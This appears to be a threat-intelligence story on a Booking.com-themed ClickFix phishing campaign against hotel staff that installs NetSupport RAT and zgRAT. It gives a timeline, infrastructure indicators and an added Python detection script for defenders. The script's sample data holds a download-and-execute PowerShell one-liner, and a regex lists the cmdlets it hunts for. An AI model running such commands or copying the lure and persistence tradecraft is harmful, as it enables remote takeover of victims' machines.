Booking.com ClickFix Phishing Campaign Delivers NetSupport RAT and zgRAT
Attackers are impersonating Booking.com pages in an ongoing ClickFix phishing campaign targeting the hospitality sector, tricking users into opening the Windows Run dialog and pasting attacker-supplied PowerShell that installs remote-access malware. Recent waves used Booking.com-branded lures such as secure-extranet[.]com, redirectors including jskeowgo[.]com, and additional phishing subdomains aimed at hotel staff, with some activity specifically targeting Italian-speaking users. Researchers observed multiple payload paths: one chain deployed NetSupport RAT through a large PowerShell stage that unpacked 14 base64-encoded components and then opened the legitimate Booking.com site to preserve the pretext, while another used staged loaders, ZIP delivery, and DLL sideloading via a legitimate psl.exe binary to install zgRAT and PureHVNC.
The malware provided full remote-control capability, including shell access, file transfer, keylogging, screen capture, and webcam or audio access, and established persistence through mechanisms such as Startup-folder shortcuts and HKCU\Run keys like SystemUpdate_<VID>. Infrastructure linked to the activity included freshly registered domains obtained in batches through Chinese and Hong Kong registrars, rotating download servers, telemetry endpoints that tracked installation progress per victim, and command-and-control systems hosted across providers in Frankfurt, Russia-linked environments, and a likely bulletproof-hosting setup tied to a newly created autonomous system. Investigators also found OPSEC clues including an exposed RDP certificate leaking the hostname WIN-FLJTJKL01VM, a PDB path referencing C:\Users\Administrator\Desktop\HTCTL32\, and malware signed with a stolen *.dodo.com wildcard certificate, supporting clustering of the campaign as a financially motivated cybercrime operation using commodity RAT tooling.

How this story unfolded
8 events from the most recent confirmed update back to the earliest known activity.
Latest NetSupport wave shows batch-registered infrastructure and OPSEC leaks
Researchers found the campaign's domains had been registered within the prior seven days through Chinese and Hong Kong registrars, with sequential registry IDs suggesting batch procurement. They also identified OPSEC artifacts including an RDP certificate on 5.188.87.49 exposing hostname WIN-FLJTJKL01VM and a PDB path referencing C:\Users\Administrator\Desktop\HTCTL32\.
New Booking.com ClickFix wave delivers NetSupport RAT
A new wave of Booking.com-themed phishing used a fake CAPTCHA ClickFix lure at secure-extranet.com to trick victims into manually running a PowerShell command. The infection chain redirected through jskeowgo.com and delivered a 9.4 MB PowerShell payload that installed 14 base64-encoded NetSupport Manager RAT components while opening the legitimate Booking.com site as cover.
Infrastructure rotation links NetSupport campaign to Frankfurt and Russian hosts
Analysis of the NetSupport RAT campaign linked two Windows Server 2022 hosts named "SMTP" on the 172.94.9.0/24 subnet in M247 Frankfurt, while the download domain later rotated to a Russian-hosted server at 77.105.133.95. Per-victim tracking IDs indicated the operator was monitoring installation start and completion across multiple victims.
NetSupport RAT v14.10 ClickFix campaign observed via applicationhost17.com
An active ClickFix/FakeCaptcha campaign was observed delivering NetSupport RAT v14.10 through either a malicious MSI installer or a PowerShell dropper that fetched a ZIP bundle from applicationhost17.com. The malware installed under %APPDATA%, created persistence with an HKCU Run key, and communicated with a live C2 over HTTP POST requests.
Researchers detail CIS-linked Booking.com zgRAT infrastructure
Breakglass Intelligence reported that the hospitality-focused campaign used 14 phishing subdomains, staging and telemetry domains, and a primary C2 at asmweosiqsaaw.com on AS208885. The report assessed the operation as a financially motivated CIS-linked cybercrime campaign rather than a nation-state activity.
Stolen dodo.com wildcard certificate abused in malware signing
The Booking.com-themed malware operation used payloads signed with a stolen *.dodo.com certificate that appeared to have CA:TRUE capabilities, enabling abuse in the delivery chain. This technical detail was identified as part of the campaign's infrastructure and tradecraft.
Threat actors deploy zgRAT/PureHVNC via Booking.com-themed ClickFix waves
During the campaign active since December 2025, operators used staged PowerShell loaders, victim fingerprinting, ZIP delivery, and DLL sideloading through a legitimate psl.exe binary loading a trojanized libpsl-5.dll. The infection chain ultimately deployed zgRAT and PureHVNC for remote access, screen control, and credential theft.
Booking.com ClickFix campaign begins targeting hospitality sector
A three-wave phishing and malware campaign impersonating Booking.com verification pages began targeting hospitality organizations, especially Italian-speaking users. Victims were tricked with ClickFix-style prompts into executing PowerShell that led to malware delivery.
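The summary and the timeline above name several host-side artifacts a defender can hunt for: PowerShell launched from the Run dialog (so parented by explorer.exe) with download-and-execute switches, an HKCU Run value named SystemUpdate_<VID> pointing into %APPDATA%, a shortcut dropped in the Startup folder, and the legitimate psl.exe loading a trojanized libpsl-5.dll. The following script is an added example, not code from Mallory, Breakglass Intelligence or Microsoft. It assumes simplified Sysmon-style events as Python dicts with field names chosen here (event, host, parent, image, cmdline, key, value, path, loaded); the sample events and host names are constructed, and the PowerShell command-line token list is a heuristic of ours rather than something reported on the page.

```python
"""Hunt for the persistence and execution artifacts described in the campaign story.
Added example; event shape and field names are assumptions, not a vendor schema."""
import ntpath
import re
from dataclasses import dataclass

# Heuristic (assumed): switches and cmdlets typical of one-liners pasted into the Run dialog.
SUSPICIOUS_PS = re.compile(
    r"(invoke-webrequest|\biwr\b|invoke-expression|\biex\b|downloadstring|"
    r"frombase64string|-enc(odedcommand)?\b|-ep\s+bypass|-w(indowstyle)?\s+hidden)",
    re.IGNORECASE,
)
RUN_KEY = re.compile(
    r"^HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\(?P<name>[^\\]+)$", re.IGNORECASE
)
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|Users\\Public)\\", re.IGNORECASE)
STARTUP_LNK = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.IGNORECASE)

# Constructed sample telemetry (not real victim data): three hosts, two benign events mixed in.
SAMPLE_EVENTS = [
    {"event": "process_create", "host": "HOTEL-FD-01", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -ep bypass -c "iwr hxxp://example.invalid/a.txt | iex"'},
    {"event": "registry_set", "host": "HOTEL-FD-01",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemUpdate_9f3a1c",
     "value": r"C:\Users\front\AppData\Roaming\nsclient\client.exe"},  # assumed file name
    {"event": "file_create", "host": "HOTEL-FD-01",
     "path": r"C:\Users\front\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"},
    {"event": "image_load", "host": "HOTEL-FD-02",
     "image": r"C:\Users\recep\AppData\Local\Temp\psl\psl.exe",
     "loaded": r"C:\Users\recep\AppData\Local\Temp\psl\libpsl-5.dll"},
    {"event": "process_create", "host": "HOTEL-FD-03", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
    {"event": "registry_set", "host": "HOTEL-FD-03",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\VendorAgent",
     "value": r"C:\Program Files\Vendor\agent.exe"},
]


@dataclass(frozen=True)
class Finding:
    rule: str
    host: str
    detail: str


def _base(path):
    """Case-folded file name of a Windows path (works on any OS via ntpath)."""
    return ntpath.basename(path).lower()


def check_event(ev):
    """Return a Finding for one event, or None if it matches no rule."""
    kind, host = ev.get("event"), ev.get("host", "?")
    if kind == "process_create":
        # Run-dialog launches are parented by explorer.exe; pair that with PowerShell
        # plus download/decode/evasion switches to catch the ClickFix paste step.
        if (_base(ev["parent"]) == "explorer.exe"
                and _base(ev["image"]) in ("powershell.exe", "pwsh.exe")
                and SUSPICIOUS_PS.search(ev.get("cmdline", ""))):
            return Finding("clickfix_run_dialog_powershell", host, ev["cmdline"])
    elif kind == "registry_set":
        m = RUN_KEY.match(ev["key"])
        if m:
            name, value = m.group("name"), ev.get("value", "")
            if name.lower().startswith("systemupdate_"):          # SystemUpdate_<VID> from the story
                return Finding("hkcu_run_systemupdate_vid", host, f"{name} -> {value}")
            if USER_WRITABLE.search(value):                         # Run value into %APPDATA%/Temp
                return Finding("hkcu_run_user_writable_path", host, f"{name} -> {value}")
    elif kind == "file_create":
        if STARTUP_LNK.search(ev["path"]):                          # Startup-folder shortcut
            return Finding("startup_folder_shortcut", host, ev["path"])
    elif kind == "image_load":
        # Legitimate psl.exe loading libpsl-5.dll from a user-writable directory: sideloading pattern.
        if (_base(ev["image"]) == "psl.exe" and _base(ev["loaded"]) == "libpsl-5.dll"
                and USER_WRITABLE.search(ev["loaded"])):
            return Finding("psl_exe_dll_sideload", host, ev["loaded"])
    return None


def scan(events):
    """Run every event through the rules and return the findings in input order."""
    return [f for f in (check_event(e) for e in events) if f is not None]


def scan_sample():
    return scan(SAMPLE_EVENTS)


if __name__ == "__main__":
    for f in scan_sample():
        print(f"[{f.rule}] {f.host}: {f.detail}")
```

The SystemUpdate_ name check and the psl.exe/libpsl-5.dll pairing are specific to this story; the explorer.exe-to-PowerShell rule and the "Run value under AppData" rule are broader heuristics that will also fire on some legitimate software, so they are best paired with a per-environment allow list rather than treated as standalone alerts.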
Sources
Same Campaign, Fresh Infrastructure: Mapping the Latest Booking.com ClickFix Wave Delivering NetSupport RAT - Breakglass Intelligence (intel.breakglass.tech, open source)
NetSupport RAT v14.10 - ClickFix Dropper Campaign via applicationhost17.com - Breakglass Intelligence (intel.breakglass.tech, open source)
Booking.com ClickFix Drops zgRAT via Stolen Dodo.com Wildcard Cert: Bulletproof Hosting, DLL Sideloading, and 14 Phishing Subdomains Targeting Hospitality - Breakglass Intelligence (intel.breakglass.tech, open source)
Don't click on that email claiming to be a disgruntled guest (theregister.com, open source)
Phishing campaign impersonates Booking .com, delivers a suite of credential-stealing malware | Microsoft Security Blog (microsoft.com, open source)
Cybercrims target hotel staff for management credentials (theregister.com, open source)